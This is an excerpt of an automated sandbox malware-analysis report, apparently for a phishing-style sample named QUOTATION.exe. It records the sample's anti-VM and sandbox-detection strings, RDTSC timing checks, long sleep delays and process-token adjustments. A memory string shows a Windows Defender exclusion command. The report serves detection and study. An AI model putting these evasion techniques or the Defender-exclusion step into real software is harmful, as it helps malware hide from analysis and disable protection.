          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 1.2.QUOTATION.exe.2751384.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: QUOTATION.exe PID: 6924, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: QUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: QUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\QUOTATION.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000739904 second address: 000000000073990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000739B7E second address: 0000000000739B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION.exe TID: 6928Thread sleep time: -38290s >= -30000s
          Source: C:\Users\user\Desktop\QUOTATION.exe TID: 6992Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2808Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6172Thread sleep time: -32000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7319
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1199
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\QUOTATION.exeThread delayed: delay time: 38290
          Source: C:\Users\user\Desktop\QUOTATION.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000013.00000000.308707041.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000013.00000000.304892797.00000000067BE000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA
          Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000013.00000000.328622205.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000013.00000000.308707041.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000013.00000000.304892797.00000000067BE000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000013.00000000.304892797.00000000067BE000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000013.00000000.308707041.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01057016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01057016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01057016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01053884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01053884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01003B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01003B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0108D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01004BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01004BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01004BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010823E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010823E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010823E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01014A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01014A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01064257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0108B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0108B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE1B8F mov eax, dword ptr fs:[00000030h]
